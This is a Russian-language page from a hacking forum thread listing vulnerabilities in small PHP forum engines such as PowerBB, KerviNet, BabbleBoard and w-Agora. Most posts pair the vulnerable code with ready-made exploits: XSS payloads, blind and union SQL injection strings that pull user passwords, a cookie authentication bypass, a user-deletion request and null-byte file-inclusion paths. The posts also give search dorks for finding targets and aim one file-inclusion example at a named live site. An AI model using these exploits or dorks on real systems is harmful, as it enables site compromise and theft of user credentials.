ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #41  
Старый 15.12.2008, 18:26
Аватар для iddqd
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567

Репутация: 2145


По умолчанию

vuBB 0.2.2 Beta
Vendor: vubb.net

Active XSS

Есть возможность указать URL удаленной аватарки.
Вставляем вместо адреса код:
Код:
javascript:eval(String.fromCharCode(97,108,101,114,116,40,120,115,115,41,59))
Dork: "Copyright 2005-2006 vuBB"

(с) iddqd

Последний раз редактировалось iddqd; 15.12.2008 в 18:29..
 
Ответить с цитированием

  #42  
Старый 07.02.2009, 13:58
Аватар для xcedz
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

DeluxeBB 1.3 Released (06-02-09)
пассивная xss
/misc.php?sub=register&redirect=xss
пассивная xss в админке
admincp.php?sub=editforum&fid=xss
x_x cedz

Последний раз редактировалось xcedz; 09.02.2009 в 20:13..
 
Ответить с цитированием

  #43  
Старый 10.02.2009, 01:23
Аватар для xcedz
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

/***************************
* my little forum
* Version 2.1 beta 4
* http://mylittleforum.net
***************************/


passive xss

index.php?mode=posting&id=1&back=xss
 
Ответить с цитированием

PowerBB 2.2.1
  #44  
Старый 26.04.2009, 19:16
Аватар для ElteRUS
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию PowerBB 2.2.1

PowerBB 2.2.1
Сайт: http://powerwd.com/

Cтарый проект (2006 год), который собрались реанимировать http://www.powerwd.com/forum/view_topic.php?id=868


SQL-injection

Уязвимый код:
register.php
PHP код:
. . .
else if (isset(
$_POST['form_sent']))
{
  . . .
      if(isset(
$_COOKIE["forumreferrer"]))
    {
        
$referral_id $_COOKIE["forumreferrer"];
        
$result $db->query('SELECT referral_count FROM '.$db->prefix.'users WHERE id='.$referral_id) or error('Invalid Member ID'__FILE____LINE__$db->error());
  . . . 
Переменная forumreferrer из куки не фильтруется. Инъекцию можно провести при регистрации нового пользователя

Эксплуатация:
Например отправляем пакет:
Цитата:
POST /register.php?action=register HTTP/1.1
Host: [host_name]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; uk; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: uk,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: [host_name]/register.php
Cookie: PHPSESSID=[PHPSESSID_value]; forumreferrer=1+and+1=if(substring(version(),1,1)= 5,1,(select+1+union+select+2)); forum_cookie=[forum_cookie_value]
Content-Type: application/x-www-form-urlencoded
Content-Length: [num_Cont_Len]
code=&form_sent=1&req_username=[username]&req_password1=[password]
&req_password2=[password]&req_image=[captcha]&req_email1=[email]&timezone=0&email_setting=1&save_pass=1

Последний раз редактировалось ElteRUS; 05.06.2009 в 22:41..
 
Ответить с цитированием

  #45  
Старый 29.05.2009, 23:10
Аватар для ZAMUT
ZAMUT
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523

Репутация: 1174
По умолчанию

/////////////////////////

Vikingboard 0.1.2

_http://vikingboard.com

/////////////////////////

Файл с данными для подключения к бд:

/inc/drivers/sql/driver_MySQL.php


Структура базы:

PHP код:
 `PREFIX|member`
  `
idint(11NOT NULL auto_increment,
  `
namevarchar(50) default NULL,
  `
passwordvarchar(50) default NULL,
  `
emailvarchar(50) default NULL
Директории доступные на запись:
/cache/

SQL - инъекция

/members.php
PHP код:
if (empty($_POST['order']))
    {
        
$DESC 'DESC';
    }
    else
    {
        
$DESC $_POST['order'];
    } 
/inc/drivers/sql/sql_MySQL.php
PHP код:
function get_member_list($order$desc$showfrom$total)
    {
        
        
$this->database->query("SELECT m.`id`, m.`name`, m.`posts`, m.`registred`, m.`homepage`, m.`title`, m.`group`, g.`g_name` 
                            FROM 
{$this->prefix}member m, {$this->prefix}group g WHERE g.`id` = m.`group` 
                            ORDER BY m.`
{$order}{$desc} LIMIT {$showfrom},{$total}");
        
$this->queries++;
        return 
$this->database;
    } 
Пример эксплоита:
Код:
POST /vig/members.php HTTP/1.0
User-Agent: Opera/9.63 (Windows NT 5.1; U; ru) Presto/2.1.1
Host: localhost
Accept: text/html

order=and if(ord(substring((select password from vboard_member where id=2),1,1))>5,1,(select id from vboard_pm))/*
Актив XSS

/post_parser.php
PHP код:
//BBCode for images
$post   =   preg_replace("#\[img\]([^\"']+?)\[/img\]#is""<img src=\"$1\" alt=\"\" />"$post); 
Код:
[#img=javascript:eval(String.fromCharCode(97,108,101,114,116,40,39,120,115,115,39,41))]loleg![/img#]
склеил с предыдущим постом

Дорк: "Powered by Vikingboard"
 
Ответить с цитированием

KerviNet forum v 1.1
  #46  
Старый 29.06.2009, 23:35
Аватар для eLWAux
eLWAux
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568

Репутация: 2399


Отправить сообщение для eLWAux с помощью ICQ
По умолчанию KerviNet forum v 1.1

KerviNet forum v 1.1
dork: "Copyright KerviNet"

Blind SQLinj & Auth Bypass
/index.php
PHP код:
if($_COOKIE['user_enter']=="auto") {
$enter_login=$_COOKIE['enter_login'];
$enter_parol=$_COOKIE['enter_parol'];
$mysql->query("SELECT name, pass, status FROM users WHERE name = '".$enter_login."' AND pass = '".$enter_parol."'"); 
exploit:
Код:
COOKIE: user_enter=auto
COOKIE: enter_login = abc
COOKIE: enter_parol = ' or name = (select name from users where id_user=1) and '1'='1';
sqlQuery: SELECT name, pass, status FROM users WHERE name = 'abc' AND pass = '' or name = (select name from users where id_user<10 limit 1)
и вы автоматом зайдете под админом, даже не зная его имени (:
SQLinj
/message.php
PHP код:
9:  $topic=$_GET['topic'];
18: if($topic) {
69$mysql->query("SELECT name, viewing, voting, status, top_status, id_forum FROM topics WHERE id_topic = ".$topic); 
exploit:
Код:
/message.php?topic=-1+union+select+1,concat_ws(0x3a,id_user,name,pass,email),3,4,5,6+from+users
SiXSS
magic_quotes = Off
/message.php
exploit:
Код:
/message.php?topic=-1+union+select+1,'{XSS}',3,4,5,6+from+users
aXSS
/add_voting.php
PHP код:
22$topic=$_GET['topic'];
61: if($topic) {
66:      $forum_edit->add_voting($time$topic$v_vopros$variants);
74: }

function 
add_voting($time$topic$v_vopros$variants) {
global 
$user;
global 
$user_ip;
if(
$user) {
global 
$mysql;
$mysql->query("UPDATE topics SET voting = 1 WHERE id_topic = ".$topic);
$mysql->query("INSERT INTO v_name VALUES (0, '".$v_vopros."', ".$topic.")");
$id_vname=mysql_insert_id();
for(
$i=0$i<count($variants); $i+=1) {
$vr_nom=$i+1;
$mysql->query("INSERT INTO v_variants VALUES (".$vr_nom.", '".$variants[$i]."', ".$id_vname.")");
}
}
return 
$id_vname;

exploit:
Код:
/add_voting.php?topic=1
POST: add_voting = ok_add
POST: v_vopros = v
POST: v_variant1 = {XSS}
POST: v_variant2 = v2
удаление пользователей
/admin/edit_user.php
PHP код:
$del_user_id=$_POST['del_user_id'];
$mysql->query("DELETE FROM users WHERE id_user = ".$del_user_id); 
exploit:
Код:
POST: del_user_id=(select user_id from users limit 1)
Full path disclosure
Код:
/include_files/voting_diagram.php
/include_files/voting.php
/include_files/topics_search.php
/include_files/topics_list.php
/include_files/top_part.php
/include_files/quick_search.php
/include_files/quick_reply.php
/include_files/moder_menu.php
/include_files/messages_list.php
/include_files/menu.php
/include_files/head.php
/include_files/forums_list.php
/include_files/forum_statistics.php
/include_files/forum_info.php
/include_files/birthday.php
/admin/head.php
 
Ответить с цитированием

  #47  
Старый 05.09.2009, 09:58
Аватар для HAXTA4OK
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

Pehota_Forum v2.0b

Активная XSS
Сообщения,Уязвимое поле Тема

посылаем сообщение любому пользователю, в поле Тема указываем <script>alert(/hiho/)</script>

и при получение сообщения высвечивается alert

ЗЫ еще есть активка при создание новой темы в самом форуме , но из за if (strlen($topic) > 25 and $topic != "") ограничения в 25 символов не возможно ее реализовать в целом,тока <script>alert()</script>
 
Ответить с цитированием

  #48  
Старый 18.11.2009, 03:01
Аватар для ElteRUS
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

BabbleBoard 1.1.6

Сайт: http://www.babbleboard.co.uk/
Табличка с юзерами: members (name, password)
Дефолтовый префикс: babbleboard_
дорк: "Powered by BabbleBoard"

Гугл выдал пару xss и csrf. Если я набоянил тут – сори

Множественные LFI’и , вот некоторые

mycontrols.php ( нужно быть зарегенным )
PHP код:
include "includes/pages/mycontrols/" $_GET['act'] . ".php"
index.php?page=mycontrols&act=../../../../robots.txt%00



admin.php ( нужно быть админом)
PHP код:
include "includes/pages/admin/" $_GET['act'] . ".php"
index.php?page=admin&act= ../../../../robots.txt%00



header.php
PHP код:
if (isset($_COOKIE['bb_lang']) && (!isset($_COOKIE['bb_name']))) {
    
$board_lang $_COOKIE['bb_lang'];

// Get language files...
include "lang/$board_lang/lang_forum.php"
Редактируем куки bb_lang=../../../../../robots.txt%00


structure.php
PHP код:
    $page $_GET['page'];
    
$page escape_string($page);

    elseif (@include (
"includes/pages/$page.php")) 
site.com/forum/index.php?page=../../../../robots.txt/././.[...]


Пример: http://else-design.info/forum/index.php?page=../../../../robots.txt/././././.[...]/./.




SQL-injection
При меджик_квотес офф

Уязвимый код:
register.php
PHP код:
} elseif ($_POST['form'] != '') {
$query_email "select EMAIL from {$db_prefix}members WHERE EMAIL='".$_POST['email']."'";
                    
$result_email mysql_query($query_email) or die("register.php - Error in query: $query_email");
                    
$email_clash mysql_num_rows($result_email); 
Эксплуатировать инъекцию можно при регистрации, вставляя свой скл-код в поле email. Правда там есть такой злобный жаваскриптовский фильтр, который не даст нам зарегится, пока мы не удовлетворим его условия. В частности он проверяет чтобы был символ @ и не было запятых =) Можно отправить пакет вручную или состряпать например такой няшный запрос, чтобы обойтись без запятых


Цитата:
filter@fuckoff'/**/or/**/(case/**/when/**/ascii(substring((select/**/name/**/from/**/babbleboard_members/**/limit/**/1/*
*/offset/**/0)/**/from/**/1/**/for/**/1))>97/**/then/**/'1'/**/else/**/(select/**/1/**/union/**/select/**/2)/**/end)='1

Последний раз редактировалось ElteRUS; 18.11.2009 в 15:07..
 
Ответить с цитированием

  #49  
Старый 28.12.2009, 20:03
Аватар для RulleR
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
Отправить сообщение для RulleR с помощью ICQ Отправить сообщение для RulleR с помощью Yahoo
По умолчанию

w-Agora forum
Web site : http://www.w-agora.com
Version : 4.2.1


Local File Inclusion

Vuln file: globals.inc [str:169]
PHP код:
/*...*/
if (isset($_GET['lang']) ) {
    
$lang strtolower($_GET['lang']);
} elseif (isset(
$_POST['lang'])) {
    
$lang $_POST['lang'];
} elseif (isset(
$_COOKIE['wa_lang'])) {
    
$lang $_COOKIE['wa_lang'];
} elseif (isset(
$_SERVER['HTTP_ACCEPT_LANGUAGE']) ) {
    
$lang substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 02);
} elseif (isset(
$_COOKIE['lang'])) {
    
$lang strtolower($_COOKIE['lang']);
}
/*...*/
require ("$lang_dir/lang_$lang.inc");
/*...*/ 
Exploit:
if magic_quotes = OFF
Код:
GET http://[host]/[path]/index.php HTTP/1.0
Cookie: lang=/../../../../../../[local_file]%00
-------------------------------------------
w-Agora <= 4.2.1 (cat) Remote SQL Injection Vulnerability

Последний раз редактировалось RulleR; 28.12.2009 в 20:06..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей vBulletin] bandera Форумы 74 07.06.2010 16:19
[Обзор уязвимостей Phorum] _-[A.M.D]HiM@S-_ Форумы 11 23.05.2010 13:42
[Обзор уязвимостей phpBB] qBiN Форумы 46 10.04.2010 23:52
[Обзор уязвимостей myBB] Goudini Форумы 24 04.09.2009 22:13



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ